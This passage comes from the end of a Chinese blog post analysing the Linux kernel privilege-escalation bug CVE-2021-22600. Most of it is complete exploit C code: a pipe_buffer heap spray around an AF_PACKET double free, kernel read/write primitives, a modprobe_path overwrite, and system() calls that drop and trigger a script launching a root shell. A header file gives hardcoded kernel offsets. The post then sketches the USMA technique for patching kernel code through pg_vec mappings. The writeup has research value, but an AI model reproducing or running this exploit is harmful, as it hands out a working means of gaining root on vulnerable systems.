ctx->page_addr = ctx->pipe_data_qw[1] - 0x8LL;
ctx->page_offset = ctx->page_addr & ~(0x3fffffff);
printf("[+] Page addr: %#lx\n", ctx->page_addr);
printf("[+] Page offset: %#lx\n", ctx->page_offset);
}

static void realloc_page(exploit_ctx *ctx) {
ctx->pipes = alloc_pipes(ctx, 160, false);

for (int i = 0; i < 32; ++i)
close(ctx->evfds[ctx->eventfd_idx + i]);
for (int i = 0; i < 160; ++i)
setpipe_sz(&ctx->pipes[i], 0x1000);
for (int i = 0; i < 160; ++i)
write(ctx->pipes[i].w, ctx->pipe_data, 3);

CHECK_V(read(ctx->corrupt->r, ctx->pipe_data, 0x78), 0x78);

ctx->pbuf_ops = ctx->pbuf->ops;
ctx->tmp_page = ctx->pbuf->page;
ctx->vmemmap_base = (ctx->pbuf->page & ~(0xfffffffULL));
ctx->kbase = ctx->pbuf_ops - PBUF_OPS_OFF;

printf("[+] Anon pipe buf ops: %#lx\n", ctx->pbuf_ops);
printf("[+] Kbase: %#lx\n", ctx->kbase);
printf("[+] Temporary page from pipe buffer: %#lx\n", ctx->tmp_page);
printf("[+] VMEMMAP base: %#lx\n", ctx->vmemmap_base);
}

uint64_t virt_to_phys(exploit_ctx *ctx, unsigned long x) {
unsigned long y = x - __START_KERNEL_map;
assert(x < y);

return x - ctx->page_offset;
}

#define __pfn_to_page(pfn) (ctx->vmemmap_base + (pfn))

static struct pipe_rw *find_pipe_sz(exploit_ctx *ctx, size_t len) {
for (int i = 0; i < 160; ++i)
if (fionread(ctx->pipes[i].r) == len)
return &ctx->pipes[i];
assert(0);
}

static void setup_rw(exploit_ctx *ctx) {
struct pipe_buffer *corrupting_buf = calloc(2, 0x40);
struct pipe_buffer *corrupt_buf =
(struct pipe_buffer *)((char *)corrupting_buf + 0x40);

corrupting_buf->page =
__pfn_to_page((virt_to_phys(ctx, ctx->page_addr) >> 12) * 0x40);

corrupting_buf->ops = ctx->pbuf_ops;
corrupting_buf->offset = 0x100;

write(ctx->corrupt->w, corrupting_buf, 0x40);
struct pipe_rw *corrupting_pipe = find_pipe_sz(ctx, corrupting_buf->len);

corrupt_buf->page = ctx->tmp_page;
corrupt_buf->len = 0xbad;
corrupt_buf->ops = ctx->pbuf_ops;

corrupting_buf->len = -0x80;

CHECK_V(write(corrupting_pipe->w, (void *)corrupting_buf, 0x80), 0x80);
struct pipe_rw *corrupt_pipe = find_pipe_sz(ctx, corrupt_buf->len);

ctx->corrupt = corrupt_pipe;
ctx->corrupt_buf = corrupt_buf;
ctx->corrupting = corrupting_pipe;
ctx->corrupting_buf = corrupting_buf;
}

static void kread(exploit_ctx *ctx, uint64_t kaddr, char *uaddr,
unsigned int len, enum ktype kreg) {

kaddr = (kreg == KHEAP)
? kaddr
: (ctx->page_offset + ctx->kvoff + kaddr - ctx->kbase);
ctx->corrupt_buf->page =
__pfn_to_page((virt_to_phys(ctx, kaddr) >> 12) * 0x40);
ctx->corrupt_buf->offset = (unsigned int)(kaddr & 0xfffLL);
ctx->corrupt_buf->len = 0x1000 - ctx->corrupt_buf->offset;

CHECK_V(write(ctx->corrupting->w, (void *)ctx->corrupting_buf, 0x80), 0x80);
CHECK_V(read(ctx->corrupt->r, uaddr, len), len);
}

static void kwrite(exploit_ctx *ctx, uint64_t kaddr, char *uaddr,
unsigned int len, enum ktype kreg) {
kaddr = (kreg == KHEAP)
? kaddr
: (ctx->page_offset + ctx->kvoff + kaddr - ctx->kbase);
ctx->corrupt_buf->page =
__pfn_to_page((virt_to_phys(ctx, kaddr) >> 12) * 0x40);
ctx->corrupt_buf->offset = 0;
ctx->corrupt_buf->len = (unsigned int)(kaddr & 0xfffLL);

CHECK_V(write(ctx->corrupting->w, (void *)ctx->corrupting_buf, 0x80), 0x80);
CHECK_V(write(ctx->corrupt->w, uaddr, len), len);
}

static void find_kvoff(exploit_ctx *ctx) {
uint64_t startup_qw = 0;
while (1) {
kread(ctx, ctx->page_offset + ctx->kvoff, (char *)&startup_qw, 8, KHEAP);
if (startup_qw != STARTUP_QW) {
ctx->kvoff += 0x10000;
continue;
}
break;
}
printf("[+] Kvoff: %#lx\n", ctx->kvoff);
}

static void exploit() {
int fd;
exploit_ctx *ctx;
struct pipe_rw *pipes, *pipes2;

setup_sandbox();
close_prev_fds();

fd = CHECK(socket(AF_PACKET, SOCK_RAW, 0));
ctx = calloc(1, sizeof(*ctx));

/**
* Create NUM_PIPES pipefds and resize each to 0x4000.
* The pipe_inode_info structure is allocated for each pipefd.
* This structure stores a circular list of pipe_buffer structures each
* consisting of a page for storing associated data. The size of the circular
* list is sizeof(pipe_buffer) * num_pages = 64 * 4 = 256. All pipe_buffers
* are allocated from the kmalloc-256 cache after the resize.
**/

pipes = alloc_pipes(ctx, NUM_PIPES, true);

// Swicth to TPACKET_V3
CHECK(setsockopt(fd, SOL_PACKET, PACKET_VERSION, &(int){TPACKET_V3},
sizeof(int)));

// Allocate rx_owner_map - kmalloc-2048
union tpacket_req_u treq = {};
treq.req3.tp_block_size = 0x1000;
treq.req3.tp_block_nr = 0x410 / 8;
treq.req3.tp_frame_size = 0x1000;
treq.req3.tp_frame_nr = 0x410 / 8;
CHECK(setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &treq, sizeof(treq)));

/**
* Allocate pipe_buffers and resize to 0x20000. (size = 64 * 32 = 2048)
* Buddy allocator allocates new slabs for kmalloc-2048.
**/

pipes2 = alloc_pipes(ctx, 0x90, false);
for (int i = 0; i < 0x90; ++i)
setpipe_sz(&pipes2[i], pipesz(2048));

/**
* Free pipe_buffers for reallocation.
* Don't free all so that the slab doesn't get freed.
**/
for (int i = 0; i < 0x90; ++i)
if (i & 4)
release_pipe(&pipes2[i]);

// Free rx_owner_map - kmalloc-2048
memset(&treq, 0, sizeof(treq));
CHECK(setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &treq, sizeof(treq)));

// Realloc rx_owner_map with pipe_buffer
for (int i = 0; i < NUM_PIPES - 0x30; ++i)
setpipe_sz(&pipes[i], pipesz(2048));

/**
* Release the first page for each pipe.
* This is cached at pipe_inode_info->tmp_page.
**/

for (int i = 0; i < NUM_PIPES - 0x30; ++i)
CHECK_V(read(pipes[i].r, ctx->pipe_data, 0x1000), 0x1000);

// Swicth to TPACKET_V2
CHECK(setsockopt(fd, SOL_PACKET, PACKET_VERSION, &(int){TPACKET_V2},
sizeof(int)));

/**
* Double free rx_owner_map
* Hopefully, this was reallocated with the pipe_buffer spray earlier.
**/
treq.req3.tp_block_size = 0x1000;
treq.req3.tp_block_nr = 1;
treq.req3.tp_frame_size = 0x1000;
treq.req3.tp_frame_nr = 1;
CHECK(setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &treq, sizeof(treq)));

// Realloc the pipe_buffer again
for (int i = NUM_PIPES - 0x30; i < NUM_PIPES; ++i)
setpipe_sz(&pipes[i], pipesz(2048));

memset(ctx->pipe_data, 0, 0x1000);
for (int i = NUM_PIPES - 0x30; i < NUM_PIPES; ++i) {
CHECK(write(pipes[i].w, ctx->pipe_data, 0x1000 - 2));
CHECK(write(pipes[i].w, ctx->pipe_data, 0x100));
ctx->pipe_data[0]++;
}

uint64_t corrupt_pipe_idx;
size_t len;

// Find the corrupted pipe_buffer using the length
for (int i = 0; i < NUM_PIPES - 0x30; ++i) {
len = fionread(pipes[i].r);
if (len != 0x1004) {
CHECK(read(pipes[i].r, &corrupt_pipe_idx, 8));
ctx->corrupt = &pipes[i];
break;
}
}

corrupt_pipe_idx += NUM_PIPES - 0x30;

// Release unused pipes
for (int i = 0; i < 0x90; ++i)
if (!(i & 4))
release_pipe(&pipes2[i]);

for (int i = 0; i < NUM_PIPES; ++i) {
if (ctx->corrupt == &pipes[i] || corrupt_pipe_idx == i)
continue;
release_pipe(&pipes[i]);
}

// Two pipe_buffers now have reference to the same page. Release the dup
// pipe_buffer to free the page.
release_dup_page(ctx, ctx->corrupt, &pipes[corrupt_pipe_idx]);
// Reclaim the freed page with a eventfd spray.
eventfd_reclaim(ctx);
realloc_page(ctx);

setup_rw(ctx);
find_kvoff(ctx);
kwrite(ctx, ctx->kbase + MODPROBE_OFF, "/tmp/x", 7, KIMG);

CHECK(write(fpair[1], "a", 1));
while (1)
sleep(0x1000000);
}

void modprobe_to_root() {
system("echo '#!/bin/sh' > /tmp/x; echo 'setsid cttyhack setuidgid 0 "
"/bin/sh' >> /tmp/x");
system("chmod +x /tmp/x");
system("echo -ne '\xff\xff\xff\xff' > /tmp/trigger && chmod 777 "
"/tmp/trigger && /tmp/trigger");
system("sh");
}

int main(void) {
int pid;
char tmp;

CHECK(pipe(fpair));
pid = fork();
if (!pid) {
exploit();
exit(0);
}

read(fpair[0], &tmp, 1);
modprobe_to_root();
}

exploit.h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#ifndef EXPLOIT_H
#define EXPLOIT_H
#include <stdint.h>

/*
 * CHECK(e): evaluate e exactly once. Yields its value when it is >= 0;
 * otherwise prints the failing expression with perror() and terminates the
 * process with EXIT_FAILURE.
 *
 * Uses GNU statement expressions; __typeof__ (rather than typeof) keeps the
 * macro usable under strict -std=c11 as well as the gnu dialects.
 */
#define CHECK(e)                                                               \
  ({                                                                           \
    __typeof__(e) e_ = (e);                                                    \
    (e_ >= 0) ? e_ : ({                                                        \
      perror(#e);                                                              \
      exit(EXIT_FAILURE);                                                      \
      1;                                                                       \
    });                                                                        \
  })

/*
 * CHECK_V(e, v): evaluate e exactly once. Yields its value when it equals v;
 * otherwise prints the failing expression with perror() and terminates the
 * process with EXIT_FAILURE.
 *
 * v is parenthesised so that compound expressions compare as a whole. The
 * exit status is always a failure code: the previous exit(e_) reported
 * success whenever the mismatching value happened to be 0.
 */
#define CHECK_V(e, v)                                                          \
  ({                                                                           \
    __typeof__(e) e_ = (e);                                                    \
    (e_ == (v)) ? e_ : ({                                                      \
      perror(#e);                                                              \
      exit(EXIT_FAILURE);                                                      \
      1;                                                                       \
    });                                                                        \
  })

#define __START_KERNEL_map 0xffffffff80000000UL
#define STARTUP_QW 0xe800a03f51258d48
#define pipesz(kmsz) ((kmsz / 64) * 0x1000)
#define NUM_PIPES 0x120
#define NUM_EVFD 0x4000
#define PBUF_OPS_OFF (0xffffffffa8014100ULL - 0xffffffffa7800000ULL)
#define MODPROBE_OFF (0xffffffff8da398c0 - 0xffffffff8d000000)

// https://elixir.bootlin.com/linux/v4.14.190/source/include/linux/pipe_fs_i.h#L21
struct pipe_buffer {
uint64_t page;
unsigned int offset, len;
uint64_t ops;
unsigned int flags;
unsigned long private;
};

struct pipe_rw {
int r, w;
};

enum ktype { KHEAP, KIMG };

typedef struct exploit_ctx {
union {
unsigned char *pipe_data;
uint64_t *pipe_data_qw;
struct pipe_buffer *pbuf;
};
struct pipe_rw *corrupt;
struct pipe_rw *corrupting;
struct pipe_buffer *corrupting_buf;
struct pipe_buffer *corrupt_buf;
struct pipe_rw *pipes;
int evfds[NUM_EVFD];
int eventfd_idx;
uint64_t page_addr;
uint64_t page_offset;
uint64_t pbuf_ops;
uint64_t tmp_page;
uint64_t vmemmap_base;
uint64_t kbase;
uint64_t kvoff;
} exploit_ctx;

static void exploit();

#endif

0x05.延伸利用手法

先前就有提到过,pg_vec是直接通过GFP_KERNEL标志从堆中申请的,所以当存在堆UAF或者堆溢出漏洞时,可以修改pg_vec,再利用mmap将pg_vec对应的内核内存映射到用户空间,从而通过修改用户空间映射的虚拟地址,修改内核内存。

这里的映射有个前提,映射的地址会检查page是否为匿名页,是否为Slab子系统分配的页,以及page是否含有type。

image-20241027212111431

type类型如下,PG_buddy为伙伴系统中的空闲页,PG_offline为逻辑上已下线的页(例如被balloon驱动回收的页,并非被交换出去的页),PG_table为用作页表的页,PG_guard为用作保护页(guard page,例如debug_pagealloc使用)的页,并非内存屏障。

image-20241027212322879

可以看到如果传入的page为内核代码段的页,以上的检查全都可以绕过。

以此我们能利用pg_vec修改内核代码段,可以修改__sys_setresuid函数将校验逻辑修改实现提权。

image-20241027212659321

  • Title: CVE-2021-22600 Linux内核提权漏洞分析及其延申利用手法(USMA)研究
  • Author: 0rb1t
  • Created at : 2024-10-27 15:53:47
  • Updated at : 2024-11-11 21:27:50
  • Link: https://redefine.ohevan.com/2024/10/27/CVE-2021-22600-Linux内核提权漏洞分析及其延申利用手法-USMA-研究/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
CVE-2021-22600 Linux内核提权漏洞分析及其延申利用手法(USMA)研究